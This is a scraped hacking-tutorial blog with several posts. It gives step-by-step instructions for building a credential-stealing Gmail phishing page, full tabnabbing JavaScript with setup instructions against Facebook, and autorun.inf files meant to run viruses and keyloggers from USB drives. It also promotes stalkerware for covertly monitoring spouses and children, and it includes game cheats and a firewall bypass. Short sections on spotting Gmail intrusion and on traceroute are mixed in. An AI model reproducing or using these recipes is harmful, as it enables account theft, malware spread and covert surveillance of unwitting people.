3. Your emails are being forwarded to a third party email address (check your settings then go to forwarding).
4. Your secondary email address is changed.
5. Phone Information is changed.

If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.

There are some additional security features that Gmail provide its users for the Security and safety o your account.

Top 50 Common Passwords Internet users use


Password guessing(social engineering) is one of the fastest technique to hack any account but most of times chances are quite rare but most internet users are stupid enough as they choose very foolish passwords for their email accounts. According to a survey by Sophos 33% of the people use the same passwords on social networking website and email accounts and some even use same password for internet banking. What this means that if a hacker can get inside a person's Facebook account, then he can also get inside his/her other accounts using the same password. The chart below is the set of most commonly used Gawker Passwords that were leaked online due to a security breach in year 2011.


How to make a Phisher or Fake Pages

Phishers are fake pages which are intentionally made by hackers to steal the critical information like identity details, usernames, passwords, IP address and other such stuff. As i mentioned intentional, which clearly means its illegal and its a cyber crime. Phishing is basically a social engineering technique to hack username and passwords by deceiving the legitimate users. Phishers are sent normally using spam or forged mails.

Note: This article is for educational purposes only, any misuse is not covered by iSARG.

What is Phishing?
Phishing is basically derived from the word called Fishing which is done by making a trap to catch the fishes. Similarly in case of hacking, hackers make Phish pages (traps) to deceive the normal or unaware user to hack his account details. Phishing technique is advancing day by day, its really tough to believe that on what extent this technique is reached but this is always remains far away from normal internet users and most of hackers.
Most of hackers and computer geeks still believe that Phishing attempt can be easily detected by seeing the URL in address bar. Below are some myths that hacking industry still have about Phishing. I will mention only few because then article will become sensitive and major security agencies will flag my website for posting sensitive data. So i will only explain the facts, if you need the same you need to fill the form and give us assurance that you will not misuse it.

Myth's about Phishing among Computer Geeks and Hackers
1. Almost each and every Hacker or computer Geek, thinks that Phishing attempt can be detected by just having a look on the URL. Let me tell you friends it was old days when you recognize Phishers by seeing URL's. But nowadays recent development in Cross site scripting(XSS) and Cross site Script forgery has made it possible that we can embed our scripts in the URL of famous websites, and you must know scripting has no limitations. Below are some examples that you can do from scripting:
a. Embed a Ajax Key logger into the main URL and user clicks on the URL, key logger script will get executed and all the keystrokes of the user will get record.
b. Spoof the fake URL: If you are little bit good in scripting and web browser exploits recognition then this can be easily done. What you need to do you need to write a script which will tell web browser to open fake page URL whenever user opens some website like Facebook. Just you need to manipulate the host file and manipulate the IP address of that website from Host file(found in windows folder).
c. Simply retrieving the information saved in the web browser like saved passwords, and bookmarks etc. Just need to write a script which will explore the locations in Windows user profile (where actually the stored information of web browsers saved).
2. One biggest myth, when you enter the data into the fake page, it will show either some warning message or show login information is incorrect. Rofl, new phishers are bit smart, now they don't show warning messages, when you login through fake page. They will actually login you into your account, and simultaneously at the back end they will steal your information using batch scripts.

So  friends i think this is enough back ground about new phishing technologies. Let's learn how to make a basic Phisher of any website in less than one or two minutes.

Steps to make your own Phisher:
1. Open the website Login or Sign in page whose phisher you want to make. Suppose you pick Gmail.
2. Right click to view the source and simultaneously open notepad.
3. Copy all the contents of the source into the notepad file.
4. Now you need to search for word action in the copied source code. You will find something like below:
how to make phishers or fake pages
Manipulate action and method

Now in this line you need to edit two things, first method and then action. Method Post is used for security purposes which encrypts the plain text, so we need to change it to GET.
Action field contains the link to next page, where it should go when you click on login or press enter. You need to change it to something.php (say isarg.php).
5. Now save the above page.
6. Now open the Notepad again and paste the below code in that:
sample batch scripts for hacking account or password
Batch script for Phisher
7. Location contains the next page URL, where you wish to send to user and passwords.html will contains the passwords.
8. Now save this file as isarg.php as told in step number 4.
9. Now create an empty file and name it as passwords.html, where the password get stored.
10. Upload all the three file to any web server and test it.

Note: In case of Facebook, it will show error after user login, for that you need to use tab nabbing trick.
Note: Always keep the extension correct, otherwise it will not work. So always use save as trick rather than save otherwise it will save files as isarg.php.txt.

Trace Route Tutorial for Hackers



In our previous tutorial we have discuss about ping sweep, today i will explain you the Trace route or simply routing in windows. I know all you know what is trace route but actually you really don't. Its quite different and its use is also quite different. I know you always tried to understand the output of trace route but not been able to what each line means in trace route. So after reading this you can understand everything quite clearly. Today i am writing my WHITE PAPER ON TRACE ROUTE..So read on..

What is Trace Route?
As the name suggests trace route, means tracing the path, but which path. Actually whenever any user opens any website in his web browser, from him it opens directly but have you ever tried to understand what background processing is going on. How your web browser actually getting to that address. That working of website i will explain on some other day but for now must know to reach to some web address, our web browser goes to different paths and chooses the best suitable path having the minimum response time.

Trace route is a network based utility which shows the path over the network between two systems and lists all the intermediate routers to get to the final destination. For what purpose trace route is used ? Main purpose of trace route is to fix network problems. This helps you in identifying, while connecting to some network where the connection is actually slowing down, which intermediate router is responsible for that.
Technically trace route is also an ICMP echo based protocol similar to ping.

But its only a primary use, for what else we can use this. As i have already told you how to get an IP address. Now when you do trace route with that IP address what it will show is that which service provider the victim is using means ISP(Internet service provider), this will help you in determining his few basic things like Country, state and sometime more deeper information too. Now how this is going to be helpful for Network forensic experts. Suppose you have made an hacking attempt on some bank or some government or some security concerned website, what they do is that they store an IP address and timestamps of each visitor in their database. Now what network forensic expert will do is that it will trace route your IP address and confirm your ISP and your country( country from which ISP belongs). Now Forensic expert will contact your ISP and provide your IP address and time to ISP and ask him to provide details that at that time this IP was assigned to which person and that how they will get complete address of the hacker and catch him red handed. I hope you got my point why trace route is that much important.

How trace route is done practically?
In windows, trace route is done by using the command tracert in command prompt. You can do it two different ways:
1. To trace route an IP address: This can be of any website or any computer system or of any network.
SYNTAX:

    tracert IP(like tracert 127.0.0.1)


2. To trace route websites: When you don't know website's IP address let trace route to translate that address for you.
SYNTAX:

    tracert websiteaddress(like tracert www.google.com)


More options:
-d     Do not resolve address to host-names
-h (maximum hops) Maximum number of hops to search the target system
-j (host-list)      Loose source route along with host-list
-w timeout       Wait timeout milliseconds for each reply

Linux trace route has more options available.

Note: you will always get less results in case when you try to trace route an Computer system of any victim. Ahhahhh more precisely you will only get around 3 to 10 entries. Three to Four when firewall of the victim doesn't alter your trace routing and more when firewall blocks ICMP echos.

Note: If you get asterisks(*) after the first entry then it confirms that firewall is playing its part and it doesn't allowing us to trace route the system but still we will be able to get his ISP address and with that we can get his location overview.

Understanding Trace Route:
Below is snapshot of normal trace route output of victim (normal computer):
tracert, trace route tutorial
Trace route live practical example.
Lets start from very first Line:
1. Very first line after the tracert shows Host Name and IP address which it got using the reverse DNS(domain name system) look up.
2. Over maximum 30 hops: 30 hops means that traceroute will only route first 30 routes between your system and victim's system. 30 is too much it usually ends in 3 to 15 hops but sometimes it goes deeper based on security and no response(as in our first case when we tries to route 14.97.26.147).

Note: Timings are basically round trip times. There are three round trip times in ping. The round trip times (or RTTs) tell us how long it took a packet to get from me to that system and back again, called the latency between the two systems. By default, three packets are sent to each system along the route, so we get three RTTs.

3. This is the address translation private IP by any one of the services from these ( RIPE, ARIN, APNIC, LACNIC, AfriNIC).
These are the IP address ranges for these private IP's:
10.0.0.0 – 10.255.255.255,
172.16.0.0 – 172.31.255.255,
192.168.0.0 – 192.168.255.255
and 224.0.0.0 - 239.255.255.255 are reserved IP Addresses for private internet use for network address translations of above mentioned services.

4. This means that the target system could not be reached. More accurately, it means that the packets could not make it there and back; they may actually be reaching the target system but encountering problems on the return trip (more on this later). This is possibly due to some kind of problem, but it may also be an intentional block due to a firewall or other security measures, and the block may affect trace route but not actual server connections.

5. If firewall doesn't block remote connections then the result will be like this.
Note: This step provides the ISP(Internet service provider).

Now Understanding trace route for websites:
tracert website, trace hackers
Trace route of website
Since isarg is a blog hosted on google that's why at start it reverse DNS name as ghs.l.google.com and translated IP address of isarg is 209.85.175.121. So our destination is 209.85.175.121

Now steps 1 to step 4 shows private internet use addresses as explained above which is used for address translation. Step 5,6 and 9 are also static private IP addresses with which but these are local IP addresses for your localhost with with the DNS communicates.

Step 7 and 8 determines the response from your ISP address. Above clearly predicts i am using tata teleservices ISP.
Step10 and 13, 14 and 15 are also Google IP address responses as this is google blog.
Steps 11 and Step 12 retrieves the different DNS servers of isarg.
Step 16 shows our destination..

The above was meaning now lets explain whole process in a go....
First of all my system reverse DNS the IP address of isarg which is found to be 209.85.175.121,Now since i haven't mentioned any specific hop count so by default it considers maximum value as 30 hops. Now my system contacts to IANA service ( RIPE, ARIN, APNIC, LACNIC, AfriNIC) requesting the response from IANA to get the translated address.  After a successful query to IANA service it returns the response back to my local system(192.168.***.***) . In between my system also get response from my ISP which is tata teleservices. Now after a successful acknowledgement our system contacts to Google server(72.14.222.166 and 72.14.232.93) which in return returns the DNS server names( for isarg and then google confirms the response and returns back the actual web page.

Tuesday, 25 March 2014

Want To Become Hacker, I Will Make You Expert By iSARG Technology Lab

You want to become Hacker! I will make you the one. Not actually the one, Expert one and its all free. Because teaching should be free as said in holy books. I can give you 100% assurance that if you are willing to become hacker, i will make you the best one. I will teach you whatever i know, whatever i don't know ( i will learn and then i will share with you). Because none can be perfect but experts always exist. Most people have aspirations to become a hacker but they don't know from where to start and what is good and what is bad. Being Hacker as per media is bad but when you go inside you will know the truth. I will help you to explore the same. We are born hackers and started hacking ever since birth but never able to realized the hackers inside ourselves. But you will now, because i will act as catalyst.
Note: Catalyst, everything is in you, i will just guide you.

Disclaimer : Its up to individual which path he chooses, my motto is to provide knowledge and ethics and i will not leave a single stone unturned.

want to become hacker
Learn Hacking Campaign
Many users daily ask me the one same question again and again. Sir, I want to become an hacker, please teach me. Its really embarrassing at first but then i realized about the positiveness and peoples willingness to learn about cyber security and ethical hacking and most of you will not believe i decided that i will start my campaign again as i don't wanna hurt feeling of learners. Its being a great time when i first started the campaign under the name ISOFTDL cybercops and then under isarg under CHECKMATE program. Because of personal reasons and hectic schedule, i need to turn down the programs but now i have time for my friends, users and learners. I am starting my Campaign again under isarg under program name "Born Hackers Club" (BHC).

Born Hackers Club :
Isarg is starting Born Hackers Club group to teach people Hacking and Cyber security. This time i will be starting from very basics and we will be more practical time than theoretical but focus will always remain at concepts.

Few Key features of Born Hackers Club Campaign :
1. Every week we learn two topics and will have one practical session to test our learnt skills.
2. I have created a website and created an virtual environment(both Linux and windows) where we all can practice hacking techniques.
3. I will share all my articles in easy to download PDF documents.
4. All practicals will be made available to all learners in form of videos.
5. I will introduce easy to contact feature, where you can ask any query live.
6. We will cover each and every tool of Backtrack and Matruix Operating system and all other hack tools in our classes.
7. All Hacking tools tutorials will be demonstrated with the help of video lectures.
8. Will teach both offensive and defensive hacking techniques.
9. Will conduct Hacking Exams Online both theoretical and Practical ( all exams will be having prizes for winners).
10.  Most Important, Everything is free and open to all. So feel free to join and learn Hacking with isarg.

The inauguration of Born Hackers Club is Planned on 1 Dec, 2012. You all will receive updates regarding the Hacking Club on regular basis.

Because when i said I will make you Hacker ! then my duty will end when you will become a Hacker i.e. When you become good enough that you can say in front of 1000 people in seminar, i can Hack you now because i am Hacker.

All the ideas are heartily welcomed and we will try our best to incorporate all the ideas suggested regarding the group and knowledge sharing, infrastructure or any thing related.

Guys i am starting this campaign to help you to find a hacker hidden inside you, so be extrovert enough to be a part of this campaign.
I am also inviting all experts to be a part of this campaign because it knowledge and it only grows when you share.

This is just a introduction what i am up to and what i am going to start. So we are 31 days away from our start. Don't worry we will not disappoint you during these 31 days, you will regularly get updates on Born Hackers Club and will continually get latest Hacking articles other than our campaign. So be a part of our Family " Family of Hackers : Because I want to listen that we are Hackers, we are born Hackers".

Regards,
iSARG Technology Lab, Uttam Nagar
New Delhi

How to hack crack or bypass cyberoam in college


Today i am going to explain you How to hack crack or bypass cyberoam websense and all other security firewalls that college, institutions, offices use to block websites at their respective places. Most of colleges, school and offices nowadays prefers a hardware firewall to block the users to access the restricted websites. Most of my friends have asked me about that how to access blocked websites or bypass cyberoam or simply cracking the cyberoam to access restricted websites in their college and offices, i have explained some methods earlier also but those loopholes are now fixed and those methods to hack cyberoam and websense doesn't work effectively now and also hacking through proxy is quite tedious task as first of all we have to search for good working proxy websites which in itself is a very tedious task, and most of times it is also blocked. So it actually wastes lot of our precious times and most important daily. So why don't we have a permanent solution for it. The method that i will explain today is really awesome and doesn't require much effort and thus its quite easy and the most important its 100% working. So friends read on for detailed hack....

hack cyberoam, crack or bypass cyberoam client
Hacking or bypassing or cracking cyberoam
For hacking Cyberoam or Websense  you must know How cyberoam and websense works? If you know how it works then you can easily find flaws in it and hack or bypass it very easily. So friends lets learn how cyberoam actually works.

Cyberoam is a 8 layer hardware firewall that offers stateful and deep packet inspection for network and web applications and user based identity security. Thus the firewall is quite secured. Now how we can hack that 8 layer security its the main important question here, as i have mentioned above that main working and blocking of any website or application by cyberoam is basically done at deep packet inspection step, now here the flaw in any security firewall lies, also in case of cyberoam and websense too. They block all websites by parsing their content and if their content contains the restricted keywords then they block that websites. They also use category blocking which also works on same concept. The flaw is with websites that uses SSL feature, the websites that contains SSL lock i.e. the websites that uses https are not blocked by them. They have to block these websites manually which is a very hectic task and believe me nobody blocks them.
So the proxy websites that uses https i.e. SSL proxies are also not blocked by these websites.
Only those proxies are blocked which are known or being heavily used. But the tool that i give you create SSL proxies by itself that means its proxies cannot be blocked. So friends this tool rocks..:P :)


Things that we need to hack cyberoam, websense and any such such hardware firewall:
1. TOR browser ( a anonymous web browser like Mozilla which has inbuilt proxy finder that bypasses the websites easily that are being blocked by cyberoam or websense).
2. A USB or pendrive ( where you will keep the portable version of TOR browser)
3. If USB drives are disabled we will use different drive for its installation. (also portable version of TOR can be executed from any place).


Steps to hack Cyberoam:
1. Download the TOR web browser.
     To download TOR browser: CLICK HERE

2. Now install the TOR web browser. In case of portable version it will extract.
    For Installation and usage Instructions visit here: CLICK HERE

3. Now open the TOR browser and start surfing your favorite website like Facebook, orkut, gmail ..everything at you office....

4. That's all the hack. I hope you all have liked it.


Note: Have a portable version in your pen drive or USB drive and enjoy where ever you want.

For such hacks keep visiting...and subscribe our posts, if you don't wanna miss any such hack....

Age of Empire Conquerors 1.0c Hack Destructive v8 Game Ranger


I am back with new version of Destructive Mind v8.0 AOE 1.0c conquerors Multiplayer hack which successfully works on Game Ranger, i have fixed server down, try later  bug in the previous version and now it will work perfectly and now no more annoying messages , also it consists of all the previous combo packs of Age of Empires including combo pack 1, combo pack 2, combo pack 3, Destructive v1 to v7 features(fixed) and few newly undetectable cheats for Roll the dice Map, RPG maps, blood maps. I have improved lots of cheats in this Age of empire hacks and make it further undetectable during the game. It works 100% on Game ranger . This trainer is awesome...just enjoy game hacks and have an extra edge over experts.
AOE hack, Age of Empire Hack, game ranger hacks
Age of Empires Conquerors Hack v8.0 by De$trUcTiVe M!nD
What's new in this version?
1. "Server down, try later" bug fixed.
2. Roll the Dice Kills bonus like 1Rollkill, 5Rollkills,10Rollkills,20Rollkills.
3. Roll the Dice Food bonus like 10RollFood, 20RollFood,50RollFood.
4. Roll the Dice Cart bonus like 1Rollcart, 2Rollcarts, 3Rollcarts, 5Rollcarts.
5. RPG map cheats like 10RPGkills,20RPGkills,50RPGkills.
6. Blood Maps Upgrades like 10Bloodkills, 1Bloodraze bonus. 
7. Hanging of Application and crashing of Game is fixed.
8. Warning and Error messages has been fixed.
9. Combo pack 1-3 and Destructive v1-7 bugs are fixed.
Note: You need to close the hack after each match and then restart again for new game. Else it will be automatically activated for the player which was your color in previous game.

Download AOE Multiplayer Hack Destructive Mind v8.0 Game Ranger

How to use the Hack on AGE OF EMPIRES II Conquerors in Game Ranger:
1. Start the Game ranger. Now Join any AOE II conquerors room.
2. While you are in room Go to the hack folder and start the Hack (Destructive Mind v8.0) by double clicking on it.
3. Now when the Game starts (means when you in Game and selecting civilizations teams etc). Go back to Hack and click on Enable Hacks and return to game.
4. After game starts, the first thing to do is to select your player number. If you’re green for example, you’re player 3 (if you didn’t change color yourself). So press `(key above the TAB button) to bring up the chat dialog and press and hold Q while pressing 3, after which press `(key above the TAB button) again to activate the hack. Don’t press ENTER – you’d only be letting others know you’re doing something stupid and the hack command won’t work anyway.


Note:  Blah.txt contains all the hacking commands that you will enter into cheat box.
Readme.txt contains the quick Guide to use the cheat commands during the game.
Don't delete any file in the package otherwise some part and features of hack will not work properly.

How to Hack Smartphones or Windows Mobile | Spymobil

After posting huge number of PC hacks, let's shift to latest technology i.e. to the field of smartphones or windows mobile. Today i will show you "How to Hack Smart phones or Windows Mobile". I will explain this with the help of a very awesome tool SPYMOBIL.
Do you want to record call data, messages, conversation or their GPS locations of your children, spouse, friend or any of your employee? Do you want to recover all SMS messages and all deleted call records? Do you wish to find their physical location every 15 minutes? If yes then SpyMobil is only made for you.

What is SpyMobil ?
SpyMobil is a next generation smartphone spy software.You can remotely spy anyone's mobile and any information about them like their conversations, call records, SMS messages and even their physical location i.e. where are they currently now. What you have to do is just install the program on the victims phone or you can also send it remotely like any keylogger or any spy tool. Once this program is downloaded on the target phone, all the SMS, call logs, and GPS location are uploaded to your own Spymobil login area via the phone’s Internet. Simply login to your account to begin viewing.

Features of SpyMobil:

1. SMS Text Message Monitoring

  Records every sent or received SMS message, including:

    Sender's Number
    SMS Date / Time Stamp
    Receiver's Number
    Message Text

 2. Call Log Monitoring

Logs all inbound/outbound calls

    Dialed Number
    Date / Time / Duration
    Caller Number

3. GPS Tracking

    Records GPS position every 60 minutes
    Map of Recorded Locations
    Works where available

and much more...


So Guys Isn't its interesting. I just tested it, its just awesome. I have hacked various smartphones using this including my friends. So why to left behind in technology. But it gonna cost you 20$ for Quaterly, 40$ for semi yearly and 100 $ for yearly license. I have a copy but it cannot be used by other guys as it gona be blocked so if You are interested then Give it a Try.....
And the most important thing 100% MONEY BACK GURANTEE ...
So guys this deserves a try ..... have Fun and happy hacking and happy spying...:P

How to Create autorun file for pendrives or usb drives

Hey Friends, today i am going to teach you "How to create a Autorun.inf file for USB drives or simply CD drives" so that it can execute programs. Programs can be viruses, keyloggers, rats or simply normal services that you want to execute automatically whenever user open his/her pendrive or USB drive. Its the easiest way to spread your programs to schedule, so that they can execute by itself without any user interaction.
Creating a simple or complex autorun file for your pendrive or USB drive.

Note: You can also follow these instructions when making a CD. You just have to burn it on the cd.

create autorun file for Usb drives or pendrives
Creating Autorun.inf file for executing keyloggers or viruses
When you plug a  USB or pen drive in, you might be interested in making a program, or other things happen as soon as you plug in. The way you accomplish this is through the Autorun.inf file. The autorun.inf file is located in the root of the usb drive and tells Windows what to do automatically.

This autorun can be used for good things and also for bad things depending on what you like. I am Destructive Mind, so i use it to run my coded viruses and keyloggers to execute automatically by themselves as soon as user open folder or simply opens pen drive or usb drive.

This tutorial covers:

    Creating a USB Autorun.inf
    Changing label\icon of thumbdrive
    Making a new option appear in the autorun menu
    Making programs automatically run when plugged in

So Read On How to create Autorun.inf file...
 
Creating a USB Autorun.inf :

To create an autorun file, open Notepad and save ‘autorun.inf’’ (with quotes) and save it to the root of the drive. All it needs to have is in the first line;

[autorun]

Changing label\icon of thumbdrive:

Follow the steps in Creating a USB Autorun.inf. Before you save it, type this in in this order!
[autorun]

icon=myicon.ico

label=MyLabel

And save. Make sure the icon file is in the root of your drive.

Making a new option appear in the autorun menu:

Right, so make your autorun file and type this into Notepad:

[autorun]

icon=default

label=[yourlabelhere]

action=programname.exe

Open Program

Save it and exit. Once again, the program has to be in the root. Now, when you plug it in, the option should appear in the menu.
Making programs automatically run when the USB is plugged in:

Follow the same instructions, blah blah blah;

[autorun]

Icon=default

label=YourLabelHere

open=programname.exe


And that’s it for this tutorial! Your Autorun program is ready to execute whatever you want. Here i have written to execute a simple program called programname.exe

Monday, 24 March 2014

How to detect unusual activity in Gmail account


Hello friends, do you think or suspect your email account has been hacked or somebody else is using your account? Do you suspect that your Email account is under attack? Is email account secured enough that it cannot be hacked? Do you want to make your email account 100% hack proof? If Yes, then this article is for you. So friends read on..

Find Unauthorized Activity in Your Email Account

Sometimes our email account has been hacked and we are not aware of that. Someone else i.e. some hacker is accessing your account and might be misusing it. But since we are not aware of that and we still think that our account and its privacy is safe but some third person is using it and accessing our private information and details. Now How you will detect that your account is under attack that How to find unauthorized activity in your email account. Here are few tips.

These are some signs of Unauthorized activity in Your email account:
1. Your new emails are marked as Read even if you’ve not read them.
2. Your emails are moved to Trash or even permanently deleted without your notice.
3. Your emails are being forwarded to a third party email address (check your settings then go to forwarding).
4. Your secondary email address is changed.
5. Phone Information is changed.

If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.

There are some additional security features that Gmail provide its users for the Security and safety o your account.
Gmail provides an additional security feature to protect your email account through the means of IP address logging. That is, Gmail records your IP address every time you login to your Gmail account. So, if a third party gets access to your account then even his/her IP is also recorded. To see a list of recorded IP address, scroll down to the bottom of your Gmail account and you’ll see something like this.

You can see from the above figure that Gmail shows the IP address of last login (last account activity). You can click on Details to see the IP address of your last 5 activities. If you find that the IP listed in the logs doesn’t belong to you, then you can suspect unauthorized activity.

Steps to stop unauthorized activity on your email account
1. Verify you mobile phone, so that if your account is somehow got hacked then it will be easier to recover your email password.
2. If you suspect that your account is already hacked then these are the recommended things that you should perform.
a. Change your Password
b. Change your security question.
c. Remove any third party email address (if any) to which your account is set to forward emails.
d. Make sure that you can access the email account of your secondary email address.
e. Also change you secondary email password and security question.

This will help you to stop all the illegal activity in your account. But there are several peoples who have asked me that their account is hacked or they forgot the password . Now if your account is already hacked means you are not been able to access your account then wait for my next post in which i will explain how to recover hacked email accounts or locked accounts.

Advanced Tabnabbing Tutorial By Isarg Uttam Nagar



Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tab nabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..
Advanced Tabnabbing, Hack Facebook, Gmail, Yahoo , Hotmail etc
Advanced Tabnabbing Tutorial
I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
Let consider a attack scenario:
1. A EthicalHacker say(me ROhit) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I (ROhit) sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:

     <!--
    Title: Advanced Tabnabbing using IFRAMES and Java script
    Author: De$trUcTiVe M!ND (s.rohit@isarg.org)
    Website: http://http://www.uttamnagar.isarg.org
    Version:1.6
    -->

    <html>
    <head><title></title></head>
    <style type="text/css">
    html {overflow: auto;}
    html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
    iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
    </style>
    <body>

    <script type="text/javascript">
    //----------Set Script Options--------------
    var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
    var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
    var FAKE_PAGE_URL = "http://www.uttamnagar.isarg.org"; //Set this to the url of the fake page
    var FAKE_PAGE_TITLE = "hacking isarg| Next Generation Hackers Portal"; //This sets the title of the fake page
    var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
    var FAKE_FAVICON = "http://www.uttamnagar.isarg.org/favicon.ico"; //Set's the fake favicon.
    var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
    var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
    //---------------End Options-----------------
    var TIMER = null;
    var SWITCHED = "false";

    //Find Browser Type
    var BROWSER_TYPE = "";
    if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
     BROWSER_TYPE = "Internet Explorer";
    }
    //Set REAL_PAGE_TITLE
    document.title=REAL_PAGE_TITLE;

    //Set FAVICON
    if(REAL_FAVICON){
     var link = document.createElement('link');
     link.type = 'image/x-icon';
     link.rel = 'shortcut icon';
     link.href = REAL_FAVICON;
     document.getElementsByTagName('head')[0].appendChild(link);
    }

    //Create our iframe (tabnab)
    var el_tabnab = document.createElement("iframe");
    el_tabnab.id="tabnab";
    el_tabnab.name="tabnab";
    document.body.appendChild(el_tabnab);
    el_tabnab.setAttribute('src', REAL_PAGE_URL);

    //Focus on the iframe (just in case the user doesn't click on it)
    el_tabnab.focus();

    //Wait to nab the tab!
    if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
     el_tabnab.onblur = function(){
     TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
     }
     el_tabnab.onfocus= function(){
     if(TIMER) clearTimeout(TIMER);
     }
    } else {
     setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
    }

    function TabNabIt(){
     if(SWITCHED == "false"){
     //Redirect the iframe to FAKE_PAGE_URL
     el_tabnab.src=FAKE_PAGE_URL;
     //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
     if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

     //Change the favicon -- This doesn't seem to work in IE
     if(BROWSER_TYPE != "Internet Explorer"){
     var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
     for (var i=0; i<links.length; i++) {
     var looplink = links[i];
     if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
     document.getElementsByTagName("head")[0].removeChild(looplink);
     }
     }
     var link = document.createElement("link");
     link.type = "image/x-icon";
     link.rel = "shortcut icon";
     link.href = FAKE_FAVICON;
     document.getElementsByTagName("head")[0].appendChild(link);
     }
     }
    }
    </script>

    </body>
    </html>


Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..